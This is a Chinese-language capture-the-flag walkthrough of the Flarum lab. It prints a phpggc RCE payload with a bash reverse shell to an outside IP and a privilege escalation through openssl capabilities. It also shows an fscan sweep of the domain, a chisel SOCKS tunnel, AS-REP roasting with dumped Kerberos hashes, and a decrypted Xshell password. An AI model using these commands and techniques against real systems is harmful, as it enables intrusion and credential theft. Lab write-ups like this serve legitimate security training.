春秋云镜刷题1——Flarum
探查
使用nmap进行探查,发现只有22端口和80端口
Web打点
bp爆破
对web进行探查,发现较为明显的邮箱名,提示采用爆破手段
爆破成功,成功登录,密码是1chris
登录后台,发现Flarum、1.6.0字样,进行漏洞查询
发现rce,https://www.leavesongs.com/PENETRATION/flarum-rce-tour.html,开始注入
注入
1 | ./phpggc -p tar -b Monolog/RCE6 system "bash -c 'bash -i >& /dev/tcp/66.154.106.206/2000 0>&1'" |
1 | @import (inline) 'data:text/css;base64,<命令结果>'; |
1 | .test { content: data-uri("phar://./assets/forum.css"); } |
内网渗透
提权
1 | getcap -r / 2>/dev/null |
发现了一个openssl可以用来提权1
openssl enc -in "/root/flag/flag01.txt"
扫描
1 | ./1777390517269_fscan_2.1.2_linux_x64 -h 172.22.60.52/24 |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94www-data@web01:/tmp$ ./1777390517269_fscan_2.1.2_linux_x64 -h 172.22.60.52/24
./1777390517269_fscan_2.1.2_linux_x64 -h 172.22.60.52/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan 2.1.2 (db0b53b 2026-04-25T10:15:30Z)
[*] 服务插件: mysql, postgresql, cassandra, ssh, findnet ... 等24个
[-] ICMP监听失败: listen ip4:icmp 0.0.0.0: socket: operation not permitted
[*] 尝试无监听ICMP探测
[-] ICMP连接失败: dial ip4:icmp 127.0.0.1: socket: operation not permitted
[-] 权限不足,无法执行原始ICMP探测
[*] 切换到ping命令模式
[*] 172.22.60.15 存活 (协议: ICMP)
[*] 172.22.60.42 存活 (协议: ICMP)
[*] 172.22.60.52 存活 (协议: ICMP)
[*] 172.22.60.8 存活 (协议: ICMP)
[*] ICMP响应率过低(1.6%),启用TCP补充探测(250个主机)
[*] 存活主机数: 4
[*] 172.22.60.52:22 ssh [Product:OpenSSH ||Version:8.9p1 Ubuntu 3ubuntu0.3] Banner:(SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.3)
[*] 172.22.60.8:636
[*] 172.22.60.8:3269
[*] 172.22.60.15:139 http [Product:Open Lighting Architecture daemon]
[*] 172.22.60.42:139 http [Product:Open Lighting Architecture daemon]
[*] 172.22.60.8:139 http [Product:Open Lighting Architecture daemon]
[*] 172.22.60.8:445 microsoft-ds [Product:Microsoft Windows SMB2] Banner:(SMB@ A b TxA{aE qd ? gH m x `v + l0j <0: + 7 * H * H * H + 7 *0( & $not_defined_...)
[*] 172.22.60.8:53 domain [Product:Simple DNS Plus] Banner:(version bind)
[*] 172.22.60.8:88 spark [Product:Apache Spark]
[*] 172.22.60.8:389 genetec-5400 [Product:Genetec Security Center] Banner:(0 d z 0 r0 domainFunctionality1 70 forestFunctionality1 70 ( domainControllerFun...)
[*] 172.22.60.52:80 http [Product:Open Lighting Architecture daemon] Banner:(HTTP/1.0 500 Internal Server Error Date: Fri, 24 Jul 2026 13:05:34 GMT Server: A...)
[*] 172.22.60.42:445 microsoft-ds [Product:Microsoft Windows SMB2] Banner:(SMB@ A G)4 e A $."* M m x `v + l0j <0: + 7 * H * H * H + 7 *0( & $not_defined_in...)
[*] 172.22.60.15:135 msrpc [Product:Microsoft Windows RPC] Banner:(@)
[*] 172.22.60.8:135 msrpc [Product:Microsoft Windows RPC] Banner:(@)
[*] 172.22.60.42:135 msrpc [Product:Microsoft Windows RPC] Banner:(@)
[*] 172.22.60.15:445 microsoft-ds [Product:Microsoft Windows SMB2] Banner:(SMB@ A P ` _ RA 8 /0 _ L m x `v + l0j <0: + 7 * H * H * H + 7 *0( & $not_defined...)
[*] 172.22.60.8:3268 genetec-5400 [Product:Genetec Security Center] Banner:(0 d z 0 r0 domainFunctionality1 70 forestFunctionality1 70 ( domainControllerFun...)
[*] 172.22.60.42:3389 ssl Banner:(U M jcc [@p r>C |e -Zf /< 5# k T Ac tI N Y 0 :X S / 0 0 y D H K { 0 * H 0"1 0 U ...)
[*] 172.22.60.15:3389 ssl Banner:(G M jcc & | . ; K@ c R3 q a o 0 ! X ,\J qD@p / 0 0 UD B| g 0 * H 0 1 0 U PC1.xia...)
[*] 172.22.60.8:3389 ssl Banner:(E M jcc 5 7 j8[ w5 (w GoA Q v 7 # ^ J ~e X 1 / 0 0 to F H #" 0 * H 0 1 0 U DC.xi...)
端口扫描中(600线程) ● 100.0% [=================] (528/528) 167/s TCP:39/1510
[完成] 扫描完成: 528/528 (耗时: 3.2s)
[*] 扫描完成,发现 20 个开放端口
[-] 资源耗尽错误 2 次,建议降低线程数(-t)或增加ulimit
[-] 插件扫描错误 172.22.60.42:445 - 目标可能不支持SMBv1
[-] 插件扫描错误 172.22.60.15:445 - 目标可能不支持SMBv1
[-] 插件扫描错误 172.22.60.42:139 - 读取SMB Session Setup响应失败: EOF
[-] 插件扫描错误 172.22.60.15:139 - 读取SMB Session Setup响应失败: EOF
[-] 插件扫描错误 172.22.60.8:139 - 读取SMB Session Setup响应失败: EOF
[+] NetInfo 172.22.60.8:135 [DC]
[+] NetInfo 172.22.60.8:135 -> 172.22.60.8
[+] NetInfo 172.22.60.8:135 -> 169.254.53.22
[-] 插件扫描错误 172.22.60.8:139 - SMB协议探测失败: 读取SMBv2协商响应失败: 消息长度过大: 2197815297
[-] 插件扫描错误 172.22.60.42:139 - SMB协议探测失败: 读取SMBv2协商响应失败: 消息长度过大: 2197815297
[-] 插件扫描错误 172.22.60.15:139 - SMB协议探测失败: 读取SMBv2协商响应失败: 消息长度过大: 2197815297
[+] NetInfo 172.22.60.42:135 [Fileserver]
[+] NetInfo 172.22.60.42:135 -> 172.22.60.42
[+] NetInfo 172.22.60.42:135 -> 169.254.64.132
[-] 插件扫描错误 172.22.60.8:445 - 目标可能不支持SMBv1
[+] NetInfo 172.22.60.15:135 [PC1]
[+] NetInfo 172.22.60.15:135 -> 172.22.60.15
[+] NetInfo 172.22.60.15:135 -> 169.254.29.234
[+] SMBInfo 172.22.60.15:445 [Windows 10 (Build 17763)] PC1 SMBv2
[-] 插件扫描错误 172.22.60.8:139 - Get "http://172.22.60.8:139": net/http: HTTP/1.x transport connection broken: malformed HTTP response "\x83\x00\x00\x01\x8f"
[-] 插件扫描错误 172.22.60.15:139 - Get "http://172.22.60.15:139": net/http: HTTP/1.x transport connection broken: malformed HTTP response "\x83\x00\x00\x01\x8f"
[-] 插件扫描错误 172.22.60.42:139 - Get "http://172.22.60.42:139": net/http: HTTP/1.x transport connection broken: malformed HTTP response "\x83\x00\x00\x01\x8f"
[+] SMBInfo 172.22.60.42:445 [Windows 10 (Build 17763)] Fileserver SMBv2
[-] 插件扫描错误 172.22.60.42:3389 - Get "https://172.22.60.42:3389": remote error: tls: internal error
[-] 插件扫描错误 172.22.60.15:3389 - Get "https://172.22.60.15:3389": remote error: tls: internal error
[+] RDP 172.22.60.15:3389 [OS:Windows Server 2019, Version 1809/Windows 10, Version 1809, Build:Windows 10.0.17763, Hostname:PC1, DNSDomain:xiaorang.lab, FQDN:PC1.xiaorang.lab, NetBIOSDomain:XIAORANG]
[+] RDP 172.22.60.42:3389 [OS:Windows Server 2019, Version 1809/Windows 10, Version 1809, Build:Windows 10.0.17763, Hostname:Fileserver, DNSDomain:xiaorang.lab, FQDN:Fileserver.xiaorang.lab, NetBIOSDomain:XIAORANG]
[+] SMBInfo 172.22.60.8:445 [Windows 10 (Build 17763)] DC SMBv2
[-] 插件扫描错误 172.22.60.8:3389 - Get "https://172.22.60.8:3389": remote error: tls: internal error
[+] RDP 172.22.60.8:3389 [OS:Windows Server 2019, Version 1809/Windows 10, Version 1809, Build:Windows 10.0.17763, Hostname:DC, DNSDomain:xiaorang.lab, FQDN:DC.xiaorang.lab, NetBIOSDomain:XIAORANG]
[*] POC加载完成: 总共388个,成功380个,失败8个
[+] http://172.22.60.52 code:500 len:0 title:None server:Apache/2.4.52 (Ubuntu) [apache-http apache/2.4.52]
[-] 172.22.60.8:389 ldap 未发现弱密码
[-] 172.22.60.8:3268 ldap 未发现弱密码
[-] 172.22.60.8:636 ldap 未发现弱密码
[-] 172.22.60.8:3269 ldap 未发现弱密码
[-] 172.22.60.8:445 smb 未发现弱密码
[-] 172.22.60.15:445 smb 未发现弱密码
[-] 插件扫描错误 172.22.60.42:3389 - RDP认证失败
[-] 172.22.60.52:22 ssh 未发现弱密码
[-] 172.22.60.42:445 smb 未发现弱密码
[-] 插件扫描错误 172.22.60.15:3389 - RDP认证失败
[-] 插件扫描错误 172.22.60.8:3389 - RDP认证失败
扫描进度 ● 100.0% [==============================] (37/37) 0/s TCP:4911/3634
[完成] 扫描完成: 37/37 (耗时: 3.8m)
[*] 扫描任务完成,耗时 4m36.029s,已扫描 37 个目标
发现4台主机,其中172.22.60.8是域控
搭建隧道
1 | ./chisel client <攻击机IP>:7000 R:1080:socks |
1 | ./chisel server -p 7000 --reverse --socks5 |
传马维权
数据库取证
使用webshell进行权限的维持,同时连接mysql数据库进行数据查找
账号喷洒
1 | proxychains GetNPUsers.py -dc-ip 172.22.60.8 -usersfile ./username.txt -format hashcat xiaorang.lab |
找到两个hash1
2$krb5asrep$23$wangyun@XIAORANG.LAB:e211c7fcce063db99a4c1d8280bed702$ed3243c55c1c5b04b5c589cf8fa7babd4252f12b5ede0f784d9ebb880eb0373c5e400ef4489e00799ac1f4e1440069c8499cf7de10dd20928305e6880407fbe443f51d795b392f9e956aae2ec723f5eb410700394c99ac3ff669917e5034308644d83f2e785d51c15820b35cdb2dfd6ff79612a14bc0b502e42237f9a5921cc2aeda5fdcdef6a284af72a6a805a08e37e221b7320487d36a141f44766bb67fe69cabe01c249b998348608f570ba644fff6a0099b03729e2ba8c226b3795a592d7a6287f6c4931d1d6e4b20d859f7ba4e8eac5dc0c7efadfdb3aa6e1c95e54421df8a8787c4e490e02ca76b42
$krb5asrep$23$zhangxin@XIAORANG.LAB:35838ec4fa6490ecffca695caf7d9836$70e0c9245ed394b5adf35ec2f5be55f806d82229c7bed4937c15f02c5cd38647f84fc92f95a2e90539d8d34524e8c2f626e412d51954c78017155a05a7ffaf7d5c6075cf07e2f8700a0dc2d562dc92992fe63e135b8ddec5744511d9386c25dea89d1d0084408d936e2dc32741f6c29a7dd84ac9e58c6f1dae8d9df88e965dc8314257d920295ed4e2554d161ba69eb756ee7749bd0f9a6ffe6c1cfa9f9a1e91827751eb772ff2b75e6ed2bf62c8ae13266c1e9e3600fae8e6c58e2d33c3e9376dff63f776e66044b74f3c268aca6dc5b9bfaf222f9e11afbe0726b1ac7d3e92bd4dc064ceadc6e9557ea686
其中hash1能爆出来1
$krb5asrep$23$wangyun@XIAORANG.LAB:e211c7fcce063db99a4c1d8280bed702$ed3243c55c1c5b04b5c589cf8fa7babd4252f12b5ede0f784d9ebb880eb0373c5e400ef4489e00799ac1f4e1440069c8499cf7de10dd20928305e6880407fbe443f51d795b392f9e956aae2ec723f5eb410700394c99ac3ff669917e5034308644d83f2e785d51c15820b35cdb2dfd6ff79612a14bc0b502e42237f9a5921cc2aeda5fdcdef6a284af72a6a805a08e37e221b7320487d36a141f44766bb67fe69cabe01c249b998348608f570ba644fff6a0099b03729e2ba8c226b3795a592d7a6287f6c4931d1d6e4b20d859f7ba4e8eac5dc0c7efadfdb3aa6e1c95e54421df8a8787c4e490e02ca76b42:Adm12geC
rdp登录
注意到有xshell,取证得到1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197PS C:\Users\wangyun\Documents\NetSarang Computer\7\Xshell\Sessions> type .\SSH.xsh
[CONNECTION:PROXY]
Proxy=
StartUp=0
[CONNECTION:SERIAL]
BaudRate=12
StopBits=0
FlowCtrl=0
Parity=0
DataBits=3
ComPort=0
[SessionInfo]
Version=7.1
Description=Xshell session file
[TRACE]
SockConn=1
SshLogin=0
SshTunneling=0
SshPacket=0
TelnetOptNego=0
[CONNECTION:SSH]
KeyExchange=
SSHCiphers=chacha20-poly1305@openssh.com:1,aes128-ctr:1,aes192-ctr:1,aes256-ctr:1,aes128-gcm@openssh.com:1,aes256-gcm@openssh.com:1,aes128-cbc:1,aes192-cbc:1,aes256-cbc:1,3des-cbc:1,blowfish-cbc:1,cast128-cbc:1,arcfour:1,rijndael128-cbc:1,rijndael192-cbc:1,rijndael256-cbc:1,rijndael-cbc@lysator.liu.se:1,arcfour128:1,arcfour256:1
AgentForwarding=0
ForwardToXmanager=1
Compression=0
NoTerminal=0
UseAuthAgent=0
MAC=
SSHMACs=hmac-sha2-256-etm@openssh.com:1,hmac-sha2-512-etm@openssh.com:1,hmac-sha1-etm@openssh.com:1,hmac-sha2-256:1,hmac-sha2-512:1,hmac-sha1:1,hmac-sha1-96:1,hmac-md5:1,hmac-md5-96:1,hmac-ripemd160:1,hmac-ripemd160@openssh.com:1,umac-64@openssh.com:1,umac-128@openssh.com:1,hmac-sha1-96-etm@openssh.com:1,hmac-md5-etm@openssh.com:1,hmac-md5-96-etm@openssh.com:1,umac-64-etm@openssh.com:1,umac-128-etm@openssh.com:1
InitRemoteDirectory=
ForwardX11=1
VexMode=2
Cipher=
Display=localhost:0.0
FwdReqCount=0
InitLocalDirectory=
NoConnFileManager=1
SSHKeyExchanges=curve25519-sha256@libssh.org:1,curve25519-sha256:1,ecdh-sha2-nistp256:1,ecdh-sha2-nistp384:1,ecdh-sha2-nistp521:1,diffie-hellman-group-exchange-sha256:1,diffie-hellman-group-exchange-sha1:1,diffie-hellman-group18-sha512:1,diffie-hellman-group16-sha512:1,diffie-hellman-group14-sha256:1,diffie-hellman-group14-sha1:1,diffie-hellman-group1-sha1:1
RemoteCommand=
SaveHostKey=0
[BELL]
FilePath=
RepeatTime=3
FlashWindow=0
BellMode=1
IgnoreTime=3
[USERINTERFACE]
NoQuickButton=0
QuickCommand=
[CONNECTION:FTP]
Passive=1
InitRemoteDirectory=
InitLocalDirectory=
[TRANSFER]
FolderMethod=0
DropXferHandler=2
XmodemUploadCmd=rx
ZmodemUploadCmd=rz -E
FolderPath=
YmodemUploadCmd=rb -E
AutoZmodem=1
SendFolderPath=
DuplMethod=0
XYMODEM_1K=0
[CONNECTION:HWCERTIFICATES]
Count=0
[CONNECTION]
Port=22
Host=172.22.60.45
Protocol=SSH
AutoReconnect=0
AutoReconnectLimit=0
Description=
AutoReconnectInterval=30
UseNaglesAlgorithm=0
FtpPort=21
IPV=0
[TERMINAL]
Rows=24
CtrlAltIsAltGr=1
InitOriginMode=0
InitReverseMode=0
DisableBlinkingText=0
CodePage=65001
InitAutoWrapMode=1
Cols=80
InitEchoMode=0
Type=xterm
DisableAlternateScreen=0
CJKAmbiAsWide=0
ScrollBottomOnKeyPress=0
PauseScrollBottom=0
DisableTitleChange=0
ForceEraseOnDEL=0
InitInsertMode=0
ShiftForcesLocalUseOfMouse=1
FontLineCharacter=1
ScrollbackSize=10240
InitCursorMode=0
FixedCols=0
BackspaceSends=2
UseInitSize=0
UseLAltAsMeta=0
UseRAltAsMeta=0
AltKeyMapPath=
DeleteSends=0
DisableTermPrinting=0
IgnoreResizeRequest=1
UseAppMouse=1
ScrollBottomOnTermOutput=1
FontPowerLine=1
ScrollErasedText=1
KeyMap=0
RecvLLAsCRLF=0
MoveToWorkFolder=1
EraseWithBackgroundColor=1
InitNewlineMode=0
InitKeypadMode=0
TerminalNameForEcho=Xshell
[TERMINAL:WINDOW]
ColorScheme=XTerm
FontQuality=0
LineSpace=0
CursorColor=65280
CursorBlinkInterval=600
TabColorType=0
FontStyle=0
CursorAppearance=0
TabColorOther=0
FontSize=9
AsianFontSize=9
CursorBlink=0
BGImageFile=
BoldMethod=2
CursorTextColor=0
BGImagePos=0
AsianFont=DejaVu Sans Mono
FontFace=DejaVu Sans Mono
CharSpace=0
AsianFontStyle=0
MarginBottom=5
MarginLeft=5
MarginTop=5
MarginRight=5
[CONNECTION:TELNET]
XdispLoc=1
NegoMode=0
CharMode=0
Display=$PCADDR:0.0
[HIGHLIGHT]
HighlightSet=None
[CONNECTION:AUTHENTICATION]
Pkcs11Pin=
Library=0
Passphrase=
Pkcs11Middleware=
Delegation=0
UseInitScript=0
CapiPin=
TelnetLoginPrompt=ogin:
Password=sNGs6lHwG7WGqIKur9StxgjJxX71EhZ07795uZ8d8GKSMk6LYtqb6FYXNPx2
RloginPasswordPrompt=assword:
UseExpectSend=0
TelnetPasswordPrompt=assword:
CapiKey=
ExpectSend_Count=0
AuthMethodList=01,10,20,30,40,50
ScriptPath=
UserKey=
UserName=zhangxin
[LOGGING]
FilePath=%n_%Y-%m-%d_%t.log
Overwrite=1
WriteFileTimestamp=0
Encoding=2
TimestampFormat=[%a]
TermCode=0
AutoStart=0
Prompt=0
WriteTermTimestamp=0
[ADVANCED]
WaitPrompt=
PromptMax=0
SendLineDelayType=0
ApplyAllChanges=1
SendLineDelayInterval=0
SendCharDelayInterval=0
[CONNECTION:RLOGIN]
TermSpeed=38400
[CONNECTION:KEEPALIVE]
SendKeepAliveInterval=60
KeepAliveInterval=60
TCPKeepAlive=0
KeepAliveString=
SendKeepAlive=0
KeepAlive=1
使用SharpXDecrypt读取得到密码admin4qwY38cc
后面大概率就是通过rbcd来进行提权获取域控的过程,不想打了,下播…









